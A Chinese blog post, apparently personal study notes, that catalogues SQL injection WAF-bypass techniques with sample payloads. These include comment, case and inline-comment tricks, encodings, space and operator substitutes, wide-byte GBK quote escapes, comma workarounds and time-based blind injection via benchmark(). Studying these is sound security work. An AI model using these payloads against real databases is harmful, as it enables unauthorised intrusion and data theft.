<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    
    <meta name="author" content="kivvs">
    
    <!-- Completely eliminate flash of wrong theme -->
    <script>
        (function() {
            const THEME_KEY = "REDEFINE-THEME-STATUS";
            const DARK = "dark", LIGHT = "light";
            
            // Get preferred theme
            function getTheme() {
                try {
                    const saved = localStorage.getItem(THEME_KEY);
                    if (saved) {
                        const { isDark } = JSON.parse(saved);
                        return isDark ? DARK : LIGHT;
                    }
                } catch (e) {}
                
                return matchMedia("(prefers-color-scheme: dark)").matches ? DARK : LIGHT;
            }
            
            // Apply theme to document
            function applyTheme(theme) {
                const isDark = theme === DARK;
                const root = document.documentElement;
                
                // Set classes for compatibility
                root.classList.add(theme);
                root.classList.remove(isDark ? LIGHT : DARK);
                root.style.colorScheme = theme;
            }
            
            // Initial application
            const theme = getTheme();
            applyTheme(theme);
            
            // Listen for system preference changes
            matchMedia("(prefers-color-scheme: dark)").addEventListener("change", ({ matches }) => {
                // Only update if using system preference (no localStorage entry)
                if (!localStorage.getItem(THEME_KEY)) {
                    applyTheme(matches ? DARK : LIGHT);
                }
            });
            
            // Set body classes ASAP (before DOMContentLoaded)
            (function() {
                const addBodyClass = () => {
                    const b = document.body;
                    if (!b) return false;
                    b.classList.add(theme + "-mode");
                    return true;
                };

                // Try immediately
                if (addBodyClass()) return;

                // Observe until body exists
                const mo = new MutationObserver(() => {
                    if (addBodyClass()) mo.disconnect();
                });
                mo.observe(document.documentElement, { childList: true, subtree: true });
            })();
        })();
    </script>
    
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

    
    <!--- Seo Part-->
    
    <link rel="canonical" href="https://kivvs.github.io/2026/08/14/sql注入绕过姿势/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
    
        
        <meta name="description" content="Hexo Theme Redefine, Redefine Your Hexo Journey.">
<meta property="og:type" content="article">
<meta property="og:title" content="sql注入绕过姿势">
<meta property="og:url" content="https://kivvs.github.io/2026/08/14/sql%E6%B3%A8%E5%85%A5%E7%BB%95%E8%BF%87%E5%A7%BF%E5%8A%BF/index.html">
<meta property="og:site_name" content="kivvs">
<meta property="og:description" content="Hexo Theme Redefine, Redefine Your Hexo Journey.">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://kivvs.github.io/images/redefine-og.webp">
<meta property="article:published_time" content="2026-08-14T14:56:13.000Z">
<meta property="article:modified_time" content="2026-08-14T14:57:16.355Z">
<meta property="article:author" content="kivvs">
<meta property="article:tag" content="SQL">
<meta property="article:tag" content="web">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://kivvs.github.io/images/redefine-og.webp">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="https://tse4-mm.cn.bing.net/th/id/OIP-C.6oyfoB93i4go2KZ08GkT3AAAAA?w=189&amp;h=180&amp;c=7&amp;r=0&amp;o=7&amp;dpr=1.5&amp;pid=1.7&amp;rm=3" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="https://tse4-mm.cn.bing.net/th/id/OIP-C.6oyfoB93i4go2KZ08GkT3AAAAA?w=189&amp;h=180&amp;c=7&amp;r=0&amp;o=7&amp;dpr=1.5&amp;pid=1.7&amp;rm=3">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="https://tse4-mm.cn.bing.net/th/id/OIP-C.6oyfoB93i4go2KZ08GkT3AAAAA?w=189&h=180&c=7&r=0&o=7&dpr=1.5&pid=1.7&rm=3">
    <!--- Page Info-->
    
    <title>
        
            sql注入绕过姿势 | kivvs
        
    </title>

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">


    <!--- Inject Part-->
    

    
<link rel="stylesheet" href="/css/style.css">


    
        
<link rel="stylesheet" href="/css/build/tailwind.css">

    

    
<link rel="stylesheet" href="/fonts/GeistMono/geist-mono.css">

    
<link rel="stylesheet" href="/fonts/Geist/geist.css">

    <!--- Font Part-->
    
    
    
    
    
    

    <script id="hexo-configurations">
    window.config = {"hostname":"kivvs.github.io","root":"/","language":"zh-CN"};
    window.theme = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true,"delete_mask":false,"title_alignment":"left","headings_top_spacing":{"h1":"3.2rem","h2":"2.4rem","h3":"1.9rem","h4":"1.6rem","h5":"1.4rem","h6":"1.3rem"}},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":true,"auto":false,"list":[]},"code_block":{"copy":true,"style":"mac","highlight_theme":{"light":"github","dark":"vs2015"},"font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":3,"number":false,"expand":true,"init_open":true},"copyright":{"enable":true,"default":"cc_by_nc_sa"},"lazyload":true,"pangu_js":false,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"mobile_limit":2,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null,"default_mode":"light"},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null},"title":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"website_counter":{"url":"https://cn.vercount.one/js","enable":true,"site_pv":true,"site_uv":true,"post_pv":true},"single_page":true,"preloader":{"enable":false,"custom_message":null},"side_tools":{"gear_rotation":true,"auto_expand":false},"open_graph":{"enable":true,"image":"/images/redefine-og.webp","description":"Hexo Theme Redefine, Redefine Your Hexo Journey."},"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"fixed","image":{"light":"/images/wallhaven-wqery6-light.webp","dark":"/images/wallhaven-wqery6-dark.webp"},"title":"Kivvs 个人博客","subtitle":{"text":[],"hitokoto":{"enable":false,"show_author":false,"api":"https://v1.hitokoto.cn"},"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":false,"style":"default","links":[{"icon":"fa-brands fa-github","url":null},{"icon":"fa-brands fa-twitter","url":null},{"icon":"fa-solid fa-at","url":"you@example.com"},{"icon":"fa-brands fa-telegram","url":null},{"icon":"/images/custom-icon.svg","url":null}],"qrs":[{"icon":"fa-brands fa-weixin","qr":null},{"icon":"/images/custom-icon.svg","qr":null}]}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null,"lrc":null}]},"mermaid":{"enable":false,"version":"11.4.1","theme":{"light":"default","dark":"dark"}}},"version":"2.9.0","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":35},"width":{"home":"1200px","pages":"1000px"},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"}},"search":{"enable":false,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"blur","masonry":{"batch_size":12,"initial_batch_size":24}},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"show_on_mobile":true,"links":null},"article_date_format":"auto","excerpt_length":200,"categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}},"footer":{"runtime":true,"icon":"<i class=\"fa-solid fa-heart fa-beat\" style=\"--fa-animation-duration: 0.5s; color: #f54545\"></i>","start":"2022/8/17 11:45:14","statistics":true,"customize":null,"icp":{"enable":false,"number":null,"url":null}},"footerStart":"2022/8/17 11:45:14","mermaid":{"style":{"light":"default","dark":"dark"}}};
    window.lang_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"};
    window.i18n = {"search":"站内搜索您需要的内容...","toc":"目录","prev":"上一页","next":"下一页","prev_posts":"上一篇","next_posts":"下一篇","page":"第 %d 页","recent_posts":"最新文章","share":"分享","powered_by":"由 %s 驱动","theme":"主题","rss_feed":"RSS Feed","category":"分类","categories":"分类","tag":"标签","tags":"标签","post":"文章","posts":"文章","tagcloud":"标签云","comment":"评论","comments":"评论","top":"置顶","sticky":"置顶","go-back-home":"回到首页","masonry_loading":"照片加载中...","image_viewer":"图片查看器","close":"关闭","exif":{"title":"EXIF","cards":{"camera":"相机","lens":"镜头","exposure":"曝光","other":"其他"},"fields":{"make":"品牌","model":"机型","date_taken":"拍摄时间","lens_model":"镜头","focal_length":"焦距","focus_mode":"对焦模式","shutter":"快门","aperture":"光圈","iso":"感光度","exposure_program":"曝光程序","exposure_compensation":"曝光补偿","metering_mode":"测光模式","flash":"闪光灯","white_balance":"白平衡","latitude":"纬度","longitude":"经度","altitude":"海拔"},"status":{"loading":"加载中...","no_exif":"无 EXIF 信息","library_missing":"EXIF 库未加载","image_source_missing":"图片地址不可用","unavailable":"EXIF 不可用（可能被 CORS 阻止或缺少元数据）","flag_unavailable":"EXIF 不可用"}},"home":"首页","archive":"归档","archives":"归档","about":"关于","links":"链接","link":"链接","friends":"友情链接","friend":"友情链接","timeline":"时间轴","shuoshuo":"说说","bookmarks":"书签","site_uv":"访问人数","site_pv":"总访问量","read_more":"阅读全文","wordcount":"字","min2read":"分钟","changelog":"更新日志","status":"状态","runtime":"博客已运行","days":"天","hours":"小时","minutes":"分钟","seconds":"秒","optimized_by":"并由 Evan 进行优化","rights":"版权所有","site_posts":"共撰写了 %s 篇文章","site_wordcount":"共 %s 字","copyright":{"title":"标题","author":"作者","link":"链接","create_time":"创建于","update_time":"更新于","license_title":"版权声明","license_content":"本文章采用 %s 进行许可。","all_rights_reserved":"版权所有 &#169 %s，禁止转载。","public_domain":"本文为公有领域作品，可自由转载、引用。"},"ago":{"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"},"create_time":"创建","update_time":"更新","expired":"这篇文章最后更新于 %s 天前，内容可能已经过时。"};
    window.data = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 8.1.2"></head>


<body>
	<div class="progress-bar-container">
	

	
	<span class="pjax-progress-bar"></span>
	<!--        <span class="swup-progress-icon">-->
	<!--            <i class="fa-solid fa-circle-notch fa-spin"></i>-->
	<!--        </span>-->
	
</div>

<main class="page-container" id="swup">

	

	<div class="main-content-container flex flex-col justify-between min-h-dvh">
		<div class="main-content-header">
			<header class="navbar-container px-6 md:px-12">
    <div class="navbar-content transition-navbar ">
        <div class="left">
            
            <a class="logo-title" href="/">
                
                kivvs
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/"
                                        >
                                    <i class="fa-regular fa-house fa-fw"></i>
                                    首页
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile sheet -->
    <div class="navbar-drawer h-dvh w-full absolute top-0 left-0 bg-background-color flex flex-col justify-between">
        <ul class="drawer-navbar-list flex flex-col px-4 justify-center items-start">
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/"
                        >
                            <span>
                                首页
                            </span>
                            
                                <i class="fa-regular fa-house fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            

            
            
        </ul>

        <div class="statistics flex justify-around my-2.5">
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/tags">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">7</div>
        <div class="label text-third-text-color text-sm">标签</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/categories">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">3</div>
        <div class="label text-third-text-color text-sm">分类</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/archives">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">20</div>
        <div class="label text-third-text-color text-sm">文章</div>
    </a>
</div>
    </div>

    <div class="window-mask"></div>

</header>


		</div>

		<div class="main-content-body transition-fade-up">
			

			<div class="main-content">
				<div class="post-page-container flex relative justify-between box-border w-full h-full">
	<div class="article-content-container">

		<div class="article-title relative w-full">
			
			<div class="w-full flex items-center pt-6 justify-start">
				<h1 class="article-title-regular text-second-text-color tracking-tight text-4xl md:text-6xl font-semibold px-2 sm:px-6 md:px-8 py-3">sql注入绕过姿势</h1>
			</div>
			
		</div>

		
		<div class="article-header flex flex-row gap-2 items-center px-2 sm:px-6 md:px-8">
			<div class="avatar w-[46px] h-[46px] shrink-0 rounded-medium border border-border-color p-px">
				<img src="https://tse4-mm.cn.bing.net/th/id/OIP-C.6oyfoB93i4go2KZ08GkT3AAAAA?w=189&h=180&c=7&r=0&o=7&dpr=1.5&pid=1.7&rm=3">
			</div>
			<div class="info flex flex-col justify-between">
				<div class="author flex items-center">
					<span class="name text-default-text-color text-lg font-semibold">kivvs</span>
					
					<span class="author-label ml-1.5 text-xs px-2 py-0.5 rounded-small text-third-text-color border border-shadow-color-1">Lv3</span>
					
				</div>
				<div class="meta-info">
					<div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2026-08-14 22:56:13</span>
        <span class="mobile">2026-08-14 22:56:13</span>
        <span class="hover-info">创建</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2026-08-14 22:57:16</span>
            <span class="mobile">2026-08-14 22:57:16</span>
            <span class="hover-info">更新</span>
        </span>
    

    
        <span class="article-categories article-meta-item">
            <i class="fa-regular fa-folders"></i>&nbsp;
            <ul>
                
                
                    
                        
                        <li>
                            <a href="/categories/web%E5%AD%A6%E4%B9%A0/">web学习</a>&nbsp;
                        </li>
                    
                    
                
            </ul>
        </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/web/">web</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/SQL/">SQL</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
    
    
        <span class="article-pv article-meta-item">
            <i class="fa-regular fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

				</div>
			</div>
		</div>
		

		


		<div class="article-content markdown-body px-2 sm:px-6 md:px-8 pb-8">
			<h2 id="1-注释符绕过"><a href="#1-注释符绕过" class="headerlink" title="1.注释符绕过"></a>1.注释符绕过</h2><p>常用的注释符有：</p>
<p>1）– 注释内容</p>
<p>2）# 注释内容</p>
<p>3）&#x2F;<em>注释内容</em>&#x2F;</p>
<p>eg：</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">union select 1,2#</span><br><span class="line"></span><br><span class="line">union select 1,2 --+</span><br></pre></td></tr></table></figure></div>

<p>构造闭合 </p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">’ union select 1,2’</span><br></pre></td></tr></table></figure></div>
<h2 id="2-大小写绕过"><a href="#2-大小写绕过" class="headerlink" title="2.大小写绕过"></a>2.大小写绕过</h2><p>常用于 waf的正则对大小写不敏感的情况。</p>
<p><code>uniOn selEct 1,2</code></p>
<h2 id="3-内联注释绕过"><a href="#3-内联注释绕过" class="headerlink" title="3.内联注释绕过"></a>3.内联注释绕过</h2><p>内联注释就是把一些特有的仅在MYSQL上的语句放在 &#x2F;<em>!…</em>&#x2F; 中，这样这些语句如果在其它数据库中是不会被执行，但在MYSQL中会执行。别和注释&#x2F;*… *&#x2F;搞混了。</p>
<p>eg：<code>union /*!select*/ 1,2</code></p>
<h2 id="4-双写关键字绕过"><a href="#4-双写关键字绕过" class="headerlink" title="4.双写关键字绕过"></a>4.双写关键字绕过</h2><p>一些简单的waf中，将关键字select等只使用replace()函数置换为空，这时候可以使用双写关键字绕过。</p>
<p>eg：<code>union seselectlect 1,2</code></p>
<h2 id="5-特殊编码绕过"><a href="#5-特殊编码绕过" class="headerlink" title="5.特殊编码绕过"></a>5.特殊编码绕过</h2><h3 id="1）十六进制绕过"><a href="#1）十六进制绕过" class="headerlink" title="1）十六进制绕过"></a>1）十六进制绕过</h3><p>eg：<code>UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name=0x61645F6C696E6B</code></p>
<h3 id="2）ascii编码绕过"><a href="#2）ascii编码绕过" class="headerlink" title="2）ascii编码绕过"></a>2）ascii编码绕过</h3><p>eg：<code>Test =CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)</code></p>
<h3 id="3）Unicode编码"><a href="#3）Unicode编码" class="headerlink" title="3）Unicode编码"></a>3）Unicode编码</h3><p>常用的几个符号的一些Unicode编码：</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">单引号: %u0027、%u02b9、%u02bc、%u02c8、%u2032、%uff07、%c0%27、%c0%a7、%e0%80%a7</span><br><span class="line"></span><br><span class="line">空格：%u0020、%uff00、%c0%20、%c0%a0、%e0%80%a0</span><br><span class="line"></span><br><span class="line">左括号：%u0028、%uff08、%c0%28、%c0%a8、%e0%80%a8</span><br><span class="line"></span><br><span class="line">右括号：%u0029、%uff09、%c0%29、%c0%a9、%e0%80%a9</span><br></pre></td></tr></table></figure></div>


<h2 id="6-空格过滤绕过"><a href="#6-空格过滤绕过" class="headerlink" title="6.空格过滤绕过"></a>6.空格过滤绕过</h2><p>可代替空格的方式：</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">1）/**/</span><br><span class="line"></span><br><span class="line">2）()</span><br><span class="line"></span><br><span class="line">3）回车(url编码中的%0a)</span><br><span class="line"></span><br><span class="line">4）(tap键上面的按钮)</span><br><span class="line"></span><br><span class="line">5）tap</span><br><span class="line"></span><br><span class="line">6）两个空格</span><br></pre></td></tr></table></figure></div>
<p>eg：<code>union/**/select/**/1,2</code></p>
<p><code>select(passwd)from(users)  #注意括号中不能含有*</code></p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select passwd from users</span><br></pre></td></tr></table></figure></div>



<h2 id="7-过滤or-and-xor-异或-not-绕过"><a href="#7-过滤or-and-xor-异或-not-绕过" class="headerlink" title="7.过滤or and xor(异或) not 绕过"></a>7.过滤or and xor(异或) not 绕过</h2><div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">and = &amp;&amp;</span><br><span class="line"></span><br><span class="line">or = ||</span><br><span class="line"></span><br><span class="line">xor = |</span><br><span class="line"></span><br><span class="line">not = !</span><br></pre></td></tr></table></figure></div>


<h2 id="8-过滤等号-绕过"><a href="#8-过滤等号-绕过" class="headerlink" title="8.过滤等号&#x3D;绕过"></a>8.过滤等号&#x3D;绕过</h2><h3 id="1）不加通配符的like执行的效果和-一致，所以可以用来绕过。"><a href="#1）不加通配符的like执行的效果和-一致，所以可以用来绕过。" class="headerlink" title="1）不加通配符的like执行的效果和&#x3D;一致，所以可以用来绕过。"></a>1）不加通配符的like执行的效果和&#x3D;一致，所以可以用来绕过。</h3><p>eg：<code>UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name like &quot;users&quot;</code></p>
<h3 id="2）rlike-模糊匹配，只要字段的值中存在要查找的-部分-就会被选择出来，用来取代-时，rlike的用法和上面的like一样，没有通配符效果和-一样"><a href="#2）rlike-模糊匹配，只要字段的值中存在要查找的-部分-就会被选择出来，用来取代-时，rlike的用法和上面的like一样，没有通配符效果和-一样" class="headerlink" title="2）rlike:模糊匹配，只要字段的值中存在要查找的 部分 就会被选择出来，用来取代&#x3D;时，rlike的用法和上面的like一样，没有通配符效果和&#x3D;一样"></a>2）rlike:模糊匹配，只要字段的值中存在要查找的 部分 就会被选择出来，用来取代&#x3D;时，rlike的用法和上面的like一样，没有通配符效果和&#x3D;一样</h3><p>eg：<code>UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name rlike &quot;users&quot; </code></p>
<h3 id="3）regexp-MySQL中使用-REGEXP-操作符来进行正则表达式匹配"><a href="#3）regexp-MySQL中使用-REGEXP-操作符来进行正则表达式匹配" class="headerlink" title="3）regexp:MySQL中使用 REGEXP 操作符来进行正则表达式匹配"></a>3）regexp:MySQL中使用 REGEXP 操作符来进行正则表达式匹配</h3><p>eg：<code>UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name regexp &quot;users&quot;</code></p>
<h3 id="4）使用大小于号来绕过"><a href="#4）使用大小于号来绕过" class="headerlink" title="4）使用大小于号来绕过"></a>4）使用大小于号来绕过</h3><p>eg：<code>select * from users where id &gt; 1 and id &lt; 3</code></p>
<h3 id="5）-等价于-，所以在前面再加一个-结果就是等号了"><a href="#5）-等价于-，所以在前面再加一个-结果就是等号了" class="headerlink" title="5）&lt;&gt; 等价于 !&#x3D;，所以在前面再加一个!结果就是等号了"></a>5）&lt;&gt; 等价于 !&#x3D;，所以在前面再加一个!结果就是等号了</h3><p>eg：<code>select * from users where !(id &lt;&gt; 1)</code></p>
<h2 id="9-过滤大小于号绕过"><a href="#9-过滤大小于号绕过" class="headerlink" title="9.过滤大小于号绕过"></a>9.过滤大小于号绕过</h2><p>在sql盲注中，一般使用大小于号来判断ascii码值的大小来达到爆破的效果。</p>
<h3 id="1）greatest-n1-n2-n3…-返回n中的最大值"><a href="#1）greatest-n1-n2-n3…-返回n中的最大值" class="headerlink" title="1）greatest(n1, n2, n3…):返回n中的最大值"></a>1）greatest(n1, n2, n3…):返回n中的最大值</h3><p>eg：<code>select * from users where id = 1 and greatest(ascii(substr(username,1,1)),1)=116</code></p>
<h3 id="2）least-n1-n2-n3…-返回n中的最小值，与上同理。"><a href="#2）least-n1-n2-n3…-返回n中的最小值，与上同理。" class="headerlink" title="2）least(n1,n2,n3…):返回n中的最小值，与上同理。"></a>2）least(n1,n2,n3…):返回n中的最小值，与上同理。</h3><h3 id="3）strcmp-str1-str2-若所有的字符串均相同，则返回0，若根据当前分类次序，第一个参数小于第二个，则返回-1，其它情况返回-1"><a href="#3）strcmp-str1-str2-若所有的字符串均相同，则返回0，若根据当前分类次序，第一个参数小于第二个，则返回-1，其它情况返回-1" class="headerlink" title="3）strcmp(str1,str2):若所有的字符串均相同，则返回0，若根据当前分类次序，第一个参数小于第二个，则返回 -1，其它情况返回 1"></a>3）strcmp(str1,str2):若所有的字符串均相同，则返回0，若根据当前分类次序，第一个参数小于第二个，则返回 -1，其它情况返回 1</h3><p>eg：<code>select * from users where id = 1 and strcmp(ascii(substr(username,1,1)),117)</code></p>
<h3 id="4）in关键字"><a href="#4）in关键字" class="headerlink" title="4）in关键字"></a>4）in关键字</h3><p>eg：<code>select * from users where id = 1 and substr(username,1,1) in (&#39;t&#39;)</code></p>
<h3 id="5）between-a-and-b-范围在a-b之间，包括a、b。"><a href="#5）between-a-and-b-范围在a-b之间，包括a、b。" class="headerlink" title="5）between a and b:范围在a-b之间，包括a、b。"></a>5）between a and b:范围在a-b之间，包括a、b。</h3><p>eg：<code>select * from users where id between 1 and 2</code></p>
<p><code>select * from users where id between 1 and 1</code></p>
<h2 id="10过滤引号绕过"><a href="#10过滤引号绕过" class="headerlink" title="10过滤引号绕过"></a>10过滤引号绕过</h2><h3 id="1）使用十六进制"><a href="#1）使用十六进制" class="headerlink" title="1）使用十六进制"></a>1）使用十六进制</h3><p>eg：<code>UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name=0x61645F6C696E6B</code></p>
<h3 id="2）宽字节，常用在web应用使用的字符集为GBK时，并且过滤了引号，就可以试试宽字节。-27表示-‘-单引号-，单引号会被转义成"><a href="#2）宽字节，常用在web应用使用的字符集为GBK时，并且过滤了引号，就可以试试宽字节。-27表示-‘-单引号-，单引号会被转义成" class="headerlink" title="2）宽字节，常用在web应用使用的字符集为GBK时，并且过滤了引号，就可以试试宽字节。%27表示 ‘(单引号)，单引号会被转义成&#39;"></a>2）宽字节，常用在web应用使用的字符集为GBK时，并且过滤了引号，就可以试试宽字节。%27表示 ‘(单引号)，单引号会被转义成&#39;</h3><p>eg：<code>%E6 union select 1,2 #</code></p>
<p><code>%df%27 union select  1,2,3  #</code></p>
<h2 id="11-过滤逗号绕过"><a href="#11-过滤逗号绕过" class="headerlink" title="11.过滤逗号绕过"></a>11.过滤逗号绕过</h2><h3 id="1）如果waf过滤了逗号，并且只能盲注，在取子串的几个函数中，有一个替代逗号的方法就是使用from-pos-for-len，其中pos代表从pos个开始读取len长度的子串"><a href="#1）如果waf过滤了逗号，并且只能盲注，在取子串的几个函数中，有一个替代逗号的方法就是使用from-pos-for-len，其中pos代表从pos个开始读取len长度的子串" class="headerlink" title="1）如果waf过滤了逗号，并且只能盲注，在取子串的几个函数中，有一个替代逗号的方法就是使用from pos for len，其中pos代表从pos个开始读取len长度的子串"></a>1）如果waf过滤了逗号，并且只能盲注，在取子串的几个函数中，有一个替代逗号的方法就是使用from pos for len，其中pos代表从pos个开始读取len长度的子串</h3><p>eg：常规写法 <code>select substr(&quot;string&quot;,1,3)</code></p>
<p>若过滤了逗号，可以使用from pos for len来取代 select substr(“string” from 1 for 3)</p>
<p>sql盲注中 <code>select ascii(substr(database() from 1 for 1)) &gt; 110</code></p>
<h3 id="2）也可使用join关键字来绕过"><a href="#2）也可使用join关键字来绕过" class="headerlink" title="2）也可使用join关键字来绕过"></a>2）也可使用join关键字来绕过</h3><p>eg：<code>select * from users union select * from (select 1)a join (select 2)b join(select 3)c</code></p>
<p>上式等价于 union select 1,2,3</p>
<h3 id="3）使用like关键字，适用于substr-等提取子串的函数中的逗号"><a href="#3）使用like关键字，适用于substr-等提取子串的函数中的逗号" class="headerlink" title="3）使用like关键字，适用于substr()等提取子串的函数中的逗号"></a>3）使用like关键字，适用于substr()等提取子串的函数中的逗号</h3><p>eg：<code>select user() like &quot;t%&quot;</code></p>
<p>上式等价于 <code>select ascii(substr(user(),1,1))=114</code></p>
<h3 id="5）使用offset关键字，适用于limit中的逗号被过滤的情况，limit-2-1等价于limit-1-offset-2"><a href="#5）使用offset关键字，适用于limit中的逗号被过滤的情况，limit-2-1等价于limit-1-offset-2" class="headerlink" title="5）使用offset关键字，适用于limit中的逗号被过滤的情况，limit 2,1等价于limit 1 offset 2"></a>5）使用offset关键字，适用于limit中的逗号被过滤的情况，limit 2,1等价于limit 1 offset 2</h3><p>eg：<code>select * from users limit 1 offset 2</code></p>
<p>上式等价于 <code>select * from users limit 2,1</code></p>
<h2 id="12-过滤函数绕过"><a href="#12-过滤函数绕过" class="headerlink" title="12.过滤函数绕过"></a>12.过滤函数绕过</h2><h3 id="1）sleep-–-benchmark"><a href="#1）sleep-–-benchmark" class="headerlink" title="1）sleep() –&gt;benchmark()"></a>1）sleep() –&gt;benchmark()</h3><p>MySQL有一个内置的BENCHMARK()函数，可以测试某些特定操作的执行速度。 参数可以是需要执行的次数和表达式。第一个参数是执行次数，第二个执行的表达式</p>
<p>eg：<code>select 1,2 and benchmark(1000000000,1)</code></p>
